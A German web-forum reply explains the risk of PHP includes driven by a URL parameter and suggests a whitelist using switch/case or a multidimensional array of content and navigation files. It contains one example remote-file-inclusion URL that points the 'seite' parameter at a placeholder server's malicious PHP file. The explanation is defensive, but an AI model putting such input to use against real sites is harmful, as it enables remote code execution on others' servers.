Hi
Was könnte denn da passieren, wenn ich damit lediglich include ???
Damit ist es möglich, ohne ausreichende Schutzmechanismen, eine externe Datei in die Seite zu includieren. ich könnte z.B. www.irgendeinedomain.de?seite=http://www.irgendeinserver.de/irgendeine_schaedliche_php_datei.php ausführen!!!!!
case "seite1":
include ("asdfasdf.dfcghn");
include ("asdfasdfa.asdf");
etc. pp.
break;
case ist auch ok. Ist beides machbar. Mit mehrdimensionalen Array würde es ungefähr so aussehen:
$dateien = array(
"info1"=>array("inhalt"=>"info1.inc.php",
"navigation"=>"navigationsdatei"),
"info2"=>array("inhalt"=>"info2.inc.php",
"navigation"=>navigationsdatei),
.
.
.
usw
)
Augerufen wird dann:
$dateien['info1']['inhalt'] //variable für den Ihnalt 1.Seite
$dateien['info1']['navigation'] //Variable für die Navigation 1.seite
$dateien['info2']['inhalt'] //variable für den Ihnalt 2.Seite
$dateien['info2']['navigation'] //Variable für die Navigation 2.seite
Gruß Bobby